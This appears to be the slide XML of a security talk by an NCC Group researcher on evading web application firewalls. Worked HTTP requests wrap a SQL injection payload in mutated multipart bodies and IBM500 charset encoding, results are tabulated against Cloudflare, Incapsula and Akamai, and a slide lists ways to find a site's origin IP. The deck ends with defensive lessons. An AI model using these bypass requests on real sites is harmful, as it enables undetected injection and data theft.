            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10477041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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6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2010" y="217333"/>
            <a:ext cx="822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Step 4 – Adding Unused Parts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26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we add some confusing parts?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headers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Duplicated values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Useless stuffs, who cares?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useful too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Spacing CR LF after “Content-Disposition:” and before the space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3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 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GB" sz="24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ASPX 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Request A3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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary=1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Content-Length: [length of body]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--1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Content-Disposition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name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="input1"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'union all select * from users--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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0"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  <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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5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Request A4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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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,boundary=irsdl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Content-Length: [length of body]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00B05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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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--1--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0"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  <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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;--1;header</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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Content-Disposition: name="input1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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; filename   ="test.jpg"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'union all select * from users--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--1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000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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085936"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10477041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0912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95313" y="419128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Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Space characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204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47720" y="4560613"/>
            <a:ext cx="0" cy="386483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>
            <a:off x="6214521" y="4563828"/>
            <a:ext cx="0" cy="38326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106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199" y="217333"/>
            <a:ext cx="532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Whitelist vs Blacklists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046" y="1702800"/>
            <a:ext cx="4814371" cy="362936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Whitelists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050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✔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Expensive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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to set up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Requires application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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knowledge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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High maintenance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Harder to break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702800"/>
            <a:ext cx="4282807" cy="3629364"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln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Blacklists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050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❌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Quick &amp; easy to set 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Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>minimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>training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Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Low maintenance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Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Easier to break</a:t>
            </a:r>
          </a:p>
          <a:p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841591" y="1702800"/>
            <a:ext cx="4839629" cy="3629364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8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2352" y="217333"/>
            <a:ext cx="865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 What If, Step 2 </a:t>
            </a:r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  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Step 4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Now that everything has been bypassed…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Jumping from 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Step 2 (Changing body type) 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to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Step 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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(Adding unused </a:t>
            </a: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parts)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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Flashback: Request A2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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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=--1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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Content-Length: [length of body]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 smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>----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Content-Disposition: </a:t>
            </a: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form-data; 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name="input1"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'union all select * from users--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 smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>----1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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</a:t>
            </a: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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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4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Request A4+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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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boundary</a:t>
            </a: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=--1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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,boundary=irsdl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Content-Length: [length of body]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----1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00B05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----1--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00B05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----1;----1;header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Content-Disposition: form-data; name="input1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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; filename   ="test.jpg"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'union all select * from users--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----1--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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771669"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10477041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0912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31039" y="411093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Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Space characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B060402020202020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05480" y="4480266"/>
            <a:ext cx="0" cy="386483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7505331" y="4480266"/>
            <a:ext cx="0" cy="41057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727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2010" y="217333"/>
            <a:ext cx="822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Step 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty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– Changing Request Encoding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98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can bypass most WAFs on its own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it detects the “charset”?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Perhaps use “,” rather than “;” for ASPX, or duplicate it, or add additional ignored strings…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8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</a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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urlencoded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foobar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charset=ibm500 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charset=utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8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Charset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean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can be quoted too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</a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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urlencoded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foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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charset="ibm500" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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0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charset=utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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01C32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8F8F8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794872" y="3168264"/>
            <a:ext cx="286439" cy="588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Request A4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GET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 /path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data; boundary=1,boundary=irsdl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Content-Length: [length of body]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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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 smtClean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--1--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean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1;--1;header</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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Content-Disposition: name="input1"</a:t>
            </a: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; filename   ="test.jpg"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'union all select * from users--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--1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000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0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77041" y="5633189"/>
          <a:ext cx="159213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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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0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3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390" y="217333"/>
            <a:ext cx="928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Remember Request A?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POST /</a:t>
            </a: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path/sample.aspx?input0=0 HTTP/1.1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HOST: victim.com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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1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urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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Content-Length: 41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solidFill>
                <a:srgbClr val="F8F8F8">
                  <a:lumMod val="10000"/>
                </a:srgb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8F8F8">
                    <a:lumMod val="10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input1='union all select * from users--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="821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Request B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GET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 /path/sample.aspx?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%89%95%97%A4%A3%F0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=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%F0 </a:t>
            </a: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HTTP/1.1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HOST: victim.com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Content-Type: </a:t>
            </a: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multipart/form-data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foobar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charset=ibm500 ;charset=utf-8 </a:t>
            </a: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; boundary=1,boundary=irsdl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Content-Length: 129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--1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--1--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7030A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--1;--1;header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Ã££`Ä¢¢£z@~¤£ñ^@@@@~£¢£K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}¤@@¢£@\@@¤¢¢``</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B01C32"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0"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  <a:endParaRPr lang="en-GB" sz="280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77041" y="5633189"/>
          <a:ext cx="1592139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0459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3112037234"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="421680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1676948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Cloudflare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Incapsula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Akamai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09126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="pinkie_pie__tadaaaa__by_xapplejack324-d6wjv2s.png (901×76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28" y="2971448"/>
            <a:ext cx="3432356" cy="292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0764" y="2835685"/>
            <a:ext cx="2025956" cy="1665336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4197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2694" y="217333"/>
            <a:ext cx="908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Lesson Learned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There is always a bypass but at least make it harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Do not rely only on cloud based WAFs when IP address can be used directly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Do not support HTTP 0.9 – disable it wherever you have a choice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Only accept known charset on incoming requests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Discard malformed HTTP requests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Train the WAF and use whitelists rather than blacklists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Whitelist </a:t>
            </a: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legitimate testers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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’ IP address during </a:t>
            </a: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your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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assessment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But </a:t>
            </a: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r</a:t>
            </a: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emember to remove the rules afterwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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935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601" y="1653872"/>
            <a:ext cx="122112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>
                    <a:lumMod val="95000"/>
                  </a:schemeClr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Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr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882" y="3029346"/>
            <a:ext cx="5730238" cy="485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4477" y="3093057"/>
            <a:ext cx="5224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55E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>Soroush Dalili (@irsdl), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="055E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>NCC Group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="055E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="055E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>NCCGroupInfosec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="055E6D"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="055E6D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600" y="3882391"/>
            <a:ext cx="812800" cy="19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22" y="4632777"/>
            <a:ext cx="2025956" cy="1665336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015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References 1/2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</a:t>
            </a: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://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf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http://www.ussrback.com/docs/papers/IDS/whiskerids.html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https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Regilero-Hiding-Wookiees-In-Http.pdf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https://securityvulns.ru/advisories/content.asp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https://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf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https://cdivilly.wordpress.com/2011/04/22/java-servlets-uri-parameters/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https://</a:t>
            </a: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msdn.microsoft.com/en-us/library/system.text.encodinginfo.getencoding.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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</a:t>
            </a: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://</a:t>
            </a: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securitee.org/files/cloudpiercer_ccs2015.pdf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https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls</a:t>
            </a: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/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4901" y="217333"/>
            <a:ext cx="658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Side Note: WAFs in the Cloud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735" y="4032449"/>
            <a:ext cx="3434577" cy="2752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5200" y="1703516"/>
            <a:ext cx="1048238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The secret is the IP address! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="057FAF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ait, what?!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Finding the IP address is not difficult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Historical DNS records, monitoring DNS changes, misconfigured subdomains, non-web service subdomains,  SSL certificates, passive IP disclosure issues in web, code, or files, SSRF, trackbacks &amp; pingbacks, verbose errors, debug/troubleshooting headers, enumerating IPv4 ranges, etc. [see the references]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Will be revealed sooner or later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Security via obscurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293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225" y="217333"/>
            <a:ext cx="64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References 2/2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https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding</a:t>
            </a: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/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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https://www.rootusers.com/find-the-ip-address-of-a-website-behind-cloudflare/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https</a:t>
            </a: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://www.ericzhang.me/resolve-cloudflare-ip-leakage/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https://community.akamai.com/community/web-performance/blog/2015/03/31/using-akamai-pragma-headers-to-investigate-or-troubleshoot-akamai-content-delivery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https://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp</a:t>
            </a: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/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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38286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8171" y="217333"/>
            <a:ext cx="979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WAF Bypass Categories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New or missed payloads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Payload mutation and encoding techniques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Finding exceptions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Special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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values (e.g. headers by “Bypass WAF” Burp Suite extension)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Larger requests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Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b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delivery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Request mutation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1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80812" y="3977417"/>
            <a:ext cx="5129561" cy="992175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70" y="2650039"/>
            <a:ext cx="2949497" cy="250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601" y="1653872"/>
            <a:ext cx="122112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>
                    <a:lumMod val="95000"/>
                  </a:schemeClr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Payload Delivery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr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0"/>
            <a:ext cx="12194323" cy="1486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5471" y="217333"/>
            <a:ext cx="854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Payload Delivery Category - Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat Ultra Light" charset="0"/>
              <a:ea typeface="Montserrat Ultra Light" charset="0"/>
              <a:cs typeface="Montserrat Ultra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200" y="1703516"/>
            <a:ext cx="104823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Concurrency </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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delay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Slow requests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Multiple requests at the same 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Unsupported SSL/TLS ciphers by the WAF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HTTPS and perhaps HTTP/2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty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v0.9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Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>HTTP-Pipelining</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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1004">
            <a:off x="8365956" y="2380083"/>
            <a:ext cx="2543175" cy="359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880812" y="4490358"/>
            <a:ext cx="5129561" cy="1183476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2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23877</TotalTime>
  <Words>2311</Words>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>562</Paragraphs>
  <Slides>60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Agency FB</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Montserrat Light</vt:lpstr>
      <vt:lpstr>Montserrat Ultra Light</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed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2018-07-04T15:39:21Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-12T15:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-06T15:38:14Z</dcterms:modified>
</cp:coreProperties>
</file>